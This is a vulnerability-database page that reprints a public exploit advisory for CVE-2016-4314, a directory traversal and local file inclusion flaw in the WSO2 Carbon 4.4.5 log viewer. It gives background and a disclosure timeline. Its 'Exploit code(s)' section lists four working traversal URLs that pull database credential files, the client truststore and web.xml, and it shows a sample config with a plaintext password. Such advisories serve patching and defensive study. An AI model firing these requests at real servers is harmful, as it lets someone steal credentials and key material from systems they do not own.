Vulners
Lucene search
WSO2 Carbon 4.4.5 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | DuckieTV CMS 1.1.5 Local File Inclusion Vulnerability | 14 Oct 201700:00 | – | zdt |
 | CVE-2016-4314 | 17 Feb 201702:59 | – | attackerkb |
 | CVE-2016-4314 | 16 Aug 201600:00 | – | circl |
 | WSO2 Carbon has multiple vulnerabilities | 18 Aug 201600:00 | – | cnvd |
 | CVE-2016-4314 | 16 Feb 201718:00 | – | cve |
 | CVE-2016-4314 | 16 Feb 201718:00 | – | cvelist |
 | WSO2 Carbon 4.4.5 - Local File Inclusion | 16 Aug 201600:00 | – | exploitdb |
 | WSO2 Carbon 4.4.5 - Local File Inclusion | 16 Aug 201600:00 | – | exploitpack |
 | WSO2 Carbon directory traversal vulnerability | 14 May 202202:46 | – | github |
 | CVE-2016-4314 | 17 Feb 201702:59 | – | nvd |
10
[+] Credits: John Page aka HYP3RLINX
Vendor:
===============
www.wso2.com
Product:
====================
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are
built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common
middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
Vulnerability Type:
=========================
Local File Inclusion (LFI)
CVE Reference:
==============
CVE-2016-4314
Vulnerability Details:
=====================
An authenticated user can download configuration files in the filesystem
via downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon
log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
hence can access any file in the file system.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
Example: accessing the registry.xml file via Local File Inclusion exposes
the MySQL passwords.
<currentDBConfig>mysql-db</currentDBConfig>
<dbConfig name="mysql-db">
<url>jdbc:mysql://localhost:3306/regdb</url>
<userName>regadmin</userName>
<password>regadmin</password>
<driverName>com.mysql.jdbc.Driver</driverName>
<maxActive>80</maxActive>
<maxWait>6000</maxWait>
<minIdle>5</minIdle>
</dbConfig>
Exploit code(s):
===============
LFI to read Database creds, truststore key file, web.xml etc...
1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Aug 2016 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.17517